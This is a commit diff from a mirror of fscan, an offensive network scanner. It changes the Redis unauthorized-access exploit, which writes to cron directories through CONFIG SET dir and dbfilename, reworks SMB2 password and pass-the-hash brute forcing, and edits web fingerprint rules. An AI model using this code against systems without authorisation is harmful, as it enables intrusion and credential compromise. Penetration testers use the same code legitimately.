mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-07-13 21:02:44 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
shadow1ng 2024-08-29 09:50:32 +08:00
parent e433c635dd
commit 513bb93e1b
3 changed files with 97 additions and 48 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
Plugins/redis.go
View File

@ -118,6 +118,9 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
} }
func Expoilt(realhost string, conn net.Conn) error { func Expoilt(realhost string, conn net.Conn) error {
if common.Noredistest {
return nil
}
flagSsh, flagCron, err := testwrite(conn) flagSsh, flagCron, err := testwrite(conn)
if err != nil { if err != nil {
return err return err
@ -221,26 +224,26 @@ func writekey(conn net.Conn, filename string) (flag bool, text string, err error
func writecron(conn net.Conn, host string) (flag bool, text string, err error) { func writecron(conn net.Conn, host string) (flag bool, text string, err error) {
flag = false flag = false
// 尝试写入Ubuntu的路径 // 尝试写入Ubuntu的路径
_, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/crontabs/\r\n")) _, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/crontabs/\r\n"))
if err != nil {
return flag, text, err
}
text, err = readreply(conn)
if err != nil { if err != nil {
return flag, text, err return flag, text, err
} }
if !strings.Contains(text, "OK") { text, err = readreply(conn)
if err != nil {
return flag, text, err
}
if !strings.Contains(text, "OK") {
// 如果没有返回"OK"可能是CentOS尝试CentOS的路径 // 如果没有返回"OK"可能是CentOS尝试CentOS的路径
_, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/\r\n")) _, err = conn.Write([]byte("CONFIG SET dir /var/spool/cron/\r\n"))
if err != nil { if err != nil {
return flag, text, err return flag, text, err
} }
text, err = readreply(conn) text, err = readreply(conn)
if err != nil { if err != nil {
return flag, text, err return flag, text, err
} }
} }
if strings.Contains(text, "OK") { if strings.Contains(text, "OK") {
_, err = conn.Write([]byte("CONFIG SET dbfilename root\r\n")) _, err = conn.Write([]byte("CONFIG SET dbfilename root\r\n"))
if err != nil { if err != nil {

118
Plugins/smb2.go
View File

@ -17,51 +17,97 @@ func SmbScan2(info *common.HostInfo) (tmperr error) {
} }
hasprint := false hasprint := false
starttime := time.Now().Unix() starttime := time.Now().Unix()
hash := common.HashBytes if len(common.HashBytes) > 0 {
for _, user := range common.Userdict["smb"] { for _, user := range common.Userdict["smb"] {
PASS: for _, hash := range common.HashBytes {
for _, pass := range common.Passwords { pass := ""
pass = strings.Replace(pass, "{user}", user, -1) flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint) if flag2 {
if flag2 { hasprint = true
hasprint = true
}
if flag == true {
var result string
if common.Domain != "" {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
} else {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
} }
if len(hash) > 0 { if flag == true {
result += "hash: " + common.Hash var result string
if common.Domain != "" {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
} else {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
}
if len(hash) > 0 {
result += "hash: " + common.Hash
} else {
result += pass
}
common.LogSuccess(result)
return err
} else { } else {
result += pass var errlog string
if len(common.Hash) > 0 {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
} else {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
}
errlog = strings.Replace(errlog, "\n", " ", -1)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.HashBytes)) * common.Timeout) {
return err
}
} }
common.LogSuccess(result)
return err
} else {
var errlog string
if len(common.Hash) > 0 { if len(common.Hash) > 0 {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err) break
} else {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
}
errlog = strings.Replace(errlog, "\n", " ", -1)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
return err
} }
} }
if len(common.Hash) > 0 { }
break PASS } else {
for _, user := range common.Userdict["smb"] {
for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
hash := []byte{}
flag, err, flag2 := Smb2Con(info, user, pass, hash, hasprint)
if flag2 {
hasprint = true
}
if flag == true {
var result string
if common.Domain != "" {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user)
} else {
result = fmt.Sprintf("[+] SMB2 %v:%v:%v ", info.Host, info.Ports, user)
}
if len(hash) > 0 {
result += "hash: " + common.Hash
} else {
result += pass
}
common.LogSuccess(result)
return err
} else {
var errlog string
if len(common.Hash) > 0 {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, common.Hash, err)
} else {
errlog = fmt.Sprintf("[-] smb2 %v:%v %v %v %v", info.Host, 445, user, pass, err)
}
errlog = strings.Replace(errlog, "\n", " ", -1)
common.LogError(errlog)
tmperr = err
if common.CheckErrs(err) {
return err
}
if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
return err
}
}
if len(common.Hash) > 0 {
break
}
} }
} }
} }
return tmperr return tmperr
} }

4
WebScan/info/rules.go
View File

@ -17,7 +17,7 @@ type PocData struct {
} }
var RuleDatas = []RuleData{ var RuleDatas = []RuleData{
{"宝塔", "body", "(app.bt.cn/static/app.png|安全入口校验失败|<title>入口校验失败</title>|href=\"http://www.bt.cn/bbs)"}, {"宝塔", "code", "(app.bt.cn/static/app.png|安全入口校验失败|<title>入口校验失败</title>|href=\"http://www.bt.cn/bbs)"},
{"深信服防火墙类产品", "code", "(SANGFOR FW)"}, {"深信服防火墙类产品", "code", "(SANGFOR FW)"},
{"360网站卫士", "code", "(webscan.360.cn/status/pai/hash|wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)"}, {"360网站卫士", "code", "(webscan.360.cn/status/pai/hash|wzws-waf-cgi|zhuji.360.cn/guard/firewall/stopattack.html)"},
{"360网站卫士", "headers", "(360wzws|CWAP-waf|zhuji.360.cn|X-Safe-Firewall)"}, {"360网站卫士", "headers", "(360wzws|CWAP-waf|zhuji.360.cn|X-Safe-Firewall)"},
@ -55,7 +55,7 @@ var RuleDatas = []RuleData{
{"Yundun", "headers", "(YUNDUN)"}, {"Yundun", "headers", "(YUNDUN)"},
{"Yunsuo", "headers", "(yunsuo)"}, {"Yunsuo", "headers", "(yunsuo)"},
{"Coding pages", "header", "(Coding Pages)"}, {"Coding pages", "header", "(Coding Pages)"},
{"启明防火墙", "body", "(/cgi-bin/webui?op=get_product_model)"}, {"启明防火墙", "code", "(/cgi-bin/webui?op=get_product_model)"},
{"Shiro", "headers", "(=deleteMe|rememberMe=)"}, {"Shiro", "headers", "(=deleteMe|rememberMe=)"},
{"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"}, {"Portainer(Docker管理)", "code", "(portainer.updatePassword|portainer.init.admin)"},
{"Gogs简易Git服务", "cookie", "(i_like_gogs)"}, {"Gogs简易Git服务", "cookie", "(i_like_gogs)"},